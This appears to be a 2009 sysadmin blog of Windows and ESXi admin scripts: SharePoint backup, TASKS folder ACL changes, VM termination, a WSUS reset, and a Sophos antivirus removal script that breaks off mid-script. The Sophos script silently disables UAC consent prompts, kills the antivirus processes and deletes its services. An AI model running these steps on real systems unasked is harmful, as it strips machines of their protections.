Monday, November 9, 2009

Sharepoint Services 3 Backup Script

REM Get BLAT.exe from a google search
REM Blat SMTP Mailer

REM *Set Variables*
set location=C:\backup
set blat=c:\windows\system32\blat.exe
set relayserver=mail.yourdomain.com
set yoursite=http://server
set emailsub=SharePointBackupReport
set templog=c:\spbackup.txt
set file=Backup.bak
set to=me@mydomain.com
set who=sharepointbackup@mydomain.com
set reply=noreply@mydomain.com

REM *Rename Old Backups and Drop Oldest*
del %location%\%file%.7day
rename %location%\%file%.6day %file%.7day
rename %location%\%file%.5day %file%.6day
rename %location%\%file%.4day %file%.5day
rename %location%\%file%.3day %file%.4day
rename %location%\%file%.2day %file%.3day
rename %location%\%file%.1day %file%.2day
rename %location%\%file% %file%.1day

REM *Lock Sharepoint as readonly, create backup, unlock*
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN\Stsadm.exe" -o setsitelock -url http://server -lock readonly
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN\Stsadm.exe" -o backup -overwrite -url %yoursite% -backupmethod full -filename %location%\%file% > %templog%
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN\Stsadm.exe" -o setsitelock -url http://server -lock none
dir %location% >> %templog%

Wednesday, July 15, 2009

Settings Permissions on the windows TASKS folder

Be VERY cautious when following these steps, or you may inadvertently open up serious security holes -- there IS a reason Microsoft locks this folder down!!

1. Open a command prompt.
2. Type XCOPY C:\WINDOWS\TASKS c:\TASKPERM /s /e /k /o
3. Go to Windows Explorer and modify the ACL of C:\TASKPERM to suit your needs. Remember that if the user/group you are assigning permissions to should not be able to modify ALL tasks, it is important to set the "Apply To" attribute to "This folder only."
4. Back at the command prompt, type CACLS C:\TASKPERM /S
Copy the SDDL string into notepad - you only need the info between the " " marks.
5. Type CACLS C:\WINDOWS\TASKS /S:...replacing/pasting the part with the SDDL string you put into notepad

6. Hey Presto!!

If you make a mistake The default ACL for Windows Server 2003 is D:P(A;OICIIO;FA;;;CO)(A;;0x1200ab;;;BO)(A;;0x1200ab;;;SO)(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)

Terminate VMHost from ESX Console

On the ESXi console, press Alt-F1.

Type the word unsupported (text will not be displayed while typing) and press Enter. A password prompt will appear. Enter the root password for the ESXi host and you will be at a # prompt in the root partition.

The process status (ps) command shows the currently-running processes on a server, and the grep command finds the specified text in the output of the ps command. Type ps -g | grep which will return the WID (first column), CID (second column) and process group ID (PGID) (fourth column) of the running processes of the VM. You will have several entries returned; the number in the fourth column of the entries is the PGID of the VM.

The kill command sends a signal to terminate a process using its ID number. The ‘-9′ parameter forces the process to quit immediately and cannot be ignored like the more graceful ‘-15′ parameter can sometimes be. Type kill -9 which will forcibly terminate the process for the specified VM.

You can check the state of the VM again by typing vm-support -x; you should no longer see the VM listed.

You can leave tech support mode by typing ‘exit’ and press Alt-F2 to return to the normal console mode.

All three of these methods work identically on ESXi hosts in both VMware Infrasture 3and vSphere.

Actual Commands
ps -g | grep %VMHOST_Name%
kill -9 %VMHost_ID%
vm-support -x

Wednesday, July 8, 2009

RESET WSUS - Client machine

net stop wuauserv
regsvr32 /s wuapi.dll
regsvr32 /s wups.dll
regsvr32 /s wuaueng.dll
regsvr32 /s wucltui.dll
regsvr32 /s msxml3.dll
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v AccountDomainSid /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v PingID /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate" /va /f
del /q /s c:\windows\softwaredistribution
net start wuauserv
wuauclt /resetauthorization /detectnow

Sunday, July 5, 2009

Sophos Anti-Virus 4/5/6/7.x -- Removal Script V2.11

SC.zip and SUBINACL.exe required from Mircosoft.com to use this script.
SC.zip - ftp://ftp.microsoft.com/reskit/win2000/sc.zip
Subinacl.exe - http://www.microsoft.com/downloads/details.aspx?FamilyID=e8ba3e56-d8fe-4a91-93cf-ed6985e3927b&displaylang=en


@ECHO OFF
ECHO ==================================================================
ECHO REMSAV-ALL-211.BAT
ECHO ------------------------------------------------------------------
ECHO Sophos Anti-Virus 4/5/6/7.x -- Removal Script V2.11
ECHO.
ECHO NOTE: Please make a full backup of the computer before you continue.
ECHO.
ECHO Do NOT run this script on computers with the following:-
ECHO -- Small Business Edition
ECHO -- Enterprise Console
ECHO -- EM Library
ECHO -- PureMessage
Echo.
ECHO Script intended for use on Windows 2000/XP/2003/Vista ONLY.
ECHO.
ECHO Press Ctrl-C to Cancel.
ECHO ==================================================================
ECHO.
Pause
CLS

ECHO Checking for 64-bit operating system...
if exist "%windir%\syswow64" (
Echo.
Echo ==========================================================
Echo We have detected that you are using this script
Echo on a 64-bit Operating System. For this script to
Echo run properly on this version of Windows, this
Echo script should be run in a 32-bit command prompt
Echo window. This can be done by running
Echo %windir%\syswow64\cmd.exe and then running the script again
Echo from that command prompt window.
Echo.
Echo Please exit this script if it is not being run in this
Echo manner by pressing CTRL+C.
Echo ==========================================================
Echo.
pause

)

ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\Sophos Anti-Rootkit" (
Echo.
Echo Sophos Anti-Rootkit found, aborting script.
Echo.
pause
Exit
)

ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\Sophos Diagnostic Utility" (
Echo.
Echo Sophos Diagnostic Utility found, aborting script.
Echo.
pause
Exit
)

ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\NAC" (
Echo.
Echo Sophos NAC found, aborting script.
Echo.
pause
Exit
)

if exist "%PROGRAMFILES%\Sophos\Enterprise Console" (
Echo.
Echo Sophos Enterprise Console found, aborting script.
Echo.
pause
Exit
)

if exist "%PROGRAMFILES%\Sophos\PureMessage" (
Echo.
Echo Sophos PureMessage found, aborting script.
Echo.
pause
Exit
)

if exist "%PROGRAMFILES%\Sophos Enterprise Manager" (
Echo.
Echo Sophos EM Library found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\SCC" (
Echo.
Echo Sophos SBE found, aborting script.
Echo.
pause
Exit
)

if exist "%PROGRAMFILES%\Sophos\Sophos Client Firewall" (
Echo.
Echo Sophos Client Firewall found, aborting script.
Echo.
pause
Exit
)

ECHO Completed.

ECHO.
ECHO Checking for Microsoft Vista (1)...
ver|find "Version 6.0" >NUL
if %errorlevel% equ 0 (
Echo.
Echo Found: Changing UAC mode to silent...
ECHO REGEDIT4 > %temp%\sopuac.reg
ECHO. >> %temp%\sopuac.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %temp%\sopuac.reg
ECHO "ConsentPromptBehaviorAdmin"=dword:00000000 >> %temp%\sopuac.reg
regedit /S %temp%\sopuac.reg >NUL 2>NUL
ECHO Completed.
) ELSE (Echo Microsoft Vista not found.)

ECHO.
ECHO Killing Active Sophos Processes...
TASKKILL /F /IM "Almon.exe" >NUL 2>NUL
TASKKILL /F /IM "ICMON.exe" >NUL 2>NUL
Echo Completed.

ECHO.
ECHO Performing Regular Uninstall...
REM MSIEXEC /X {15C418EB-7675-42be-B2B3-281952DA014D} /qn 2>NUL
REM MSIEXEC /X {C12953C2-4F15-4A6C-91BC-511B96AE2775} /qn 2>NUL
REM MSIEXEC /X {09C6BF52-6DBA-4A97-9939-B6C24E4738BF} REBOOT=SUPPRESS /qn 2>NUL
REM MSIEXEC /X {034759DA-E21A-4795-BFB3-C66D17FAD183} REBOOT=SUPPRESS /qn 2>NUL
REM MSIEXEC /X {FF11005D-CBC8-45D5-A288-25C7BB304121} /qn 2>NUL
"%PROGRAMFILES%\Sophos Sweep for NT\Setup.exe" -ni -force -remove 2>NUL
ECHO Completed.

ECHO.
ECHO Performing MSI Cleanup On Sophos Components...
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {15C418EB-7675-42be-B2B3-281952DA014D} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {09C6BF52-6DBA-4A97-9939-B6C24E4738BF} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {C12953C2-4F15-4A6C-91BC-511B96AE2775} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {FF11005D-CBC8-45D5-A288-25C7BB304121} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {034759DA-E21A-4795-BFB3-C66D17FAD183} >NUL 2>NUL
Echo Completed.

ECHO.
ECHO Constructing Registry Keys For Removal...
ECHO Completed.

ECHO REGEDIT4 > %TEMP%\SOTMP.REG
ECHO. >> %TEMP%\SOTMP.REG

REM ====** Registry Keys marked for Removal **=====================================================================

REM === MSI Installer GUIDs ===
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG

ECHO [-HKEY_CLASSES_ROOT\Installer\Features\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG

ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG

ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG

ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG

ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG

ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG

ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG

REM === Sophos Application Settings ===
ECHO [-HKEY_CURRENT_USER\Software\Sophos] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\Software\Sophos] >> %TEMP%\SOTMP.REG

REM === Sophos Uninstall Keys ===
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09C6BF52-6DBA-4A97-9939-B6C24E4738BF}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{15C418EB-7675-42be-B2B3-281952DA014D}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C12953C2-4F15-4A6C-91BC-511B96AE2775}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{FF11005D-CBC8-45D5-A288-25C7BB304121}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{034759DA-E21A-4795-BFB3-C66D17FAD183}] >> %TEMP%\SOTMP.REG

REM === Sophos Legacy Services Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG

REM === Sophos Event Log Registration Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG

REM === Sophos Services Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG

REM === Sophos Legacy Services Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG

REM === Sophos Event Log Registration Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG

REM === Sophos Services Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG

REM === Sophos Legacy Services Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG

REM === Sophos Event Log Registration Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG

REM === Sophos Services Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG

REM === Sophos Legacy Services Current===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG

REM === Sophos Event Log Registration Current ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG

REM === Sophos Services Current ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlControlSet\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
